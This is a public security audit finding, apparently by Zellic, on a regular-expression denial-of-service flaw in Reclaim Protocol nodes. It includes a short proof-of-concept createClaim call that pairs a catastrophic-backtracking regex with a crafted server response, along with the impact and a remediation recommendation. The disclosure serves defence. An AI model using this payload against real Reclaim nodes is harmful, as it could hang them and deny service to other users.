Assessment reportsPublic findings
Back to Zellic site
Assessment reports>Reclaim Protocol>High findings>Node ReDoS in claim receipt validation
GeneralOverview
Findings
Critical (4)
High (2)Server-side request forgeryNode ReDoS in claim receipt validation
Medium (5)
Low (6)
Informational (2)
DiscussionSpoofing risk via website data format instabilitySpoofing risk via insecure contains/RegEx checksSensitive data exposure riskUser-phishing riskLack of `postMessage` origin validationProxy/scraping service usageNode centralization risk
Audit ResultsSummary
Category: Coding Mistakes

Node ReDoS in claim receipt validation

High Severity
High Impact
High Likelihood

Description

Reclaim nodes can validate claim receipts using a regular expression (RegEx) provided by the user. The node does not place a limit on the time or complexity of the RegEx execution. This allows an attacker to perform a ReDoS attack by providing a RegEx and a website that the RegEx is matched on.

To test this vulnerability, we can use the following:

import { createClaim } from '@reclaimprotocol/reclaim-node'

const claim = await createClaim({
  name: 'http',
  params: {
    url: 'https://...', // responds with aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
    method: 'GET',
    responseMatches: [{
      type: 'regex',
      value: '([a-z]+)+$',
    }],
    responseRedactions: [],
  },
  secretParams: {
    cookieStr: 'a'
  },
  ownerPrivateKey: '0x...'
})

console.log(claim)

Impact

An attacker can cause the Reclaim node to hang indefinitely, preventing access from any other Reclaim user.

Recommendations

Reclaim should use a RegEx library that limits the time and complexity of the RegEx execution.

Remediation

Zellic © 2025Back to top ↑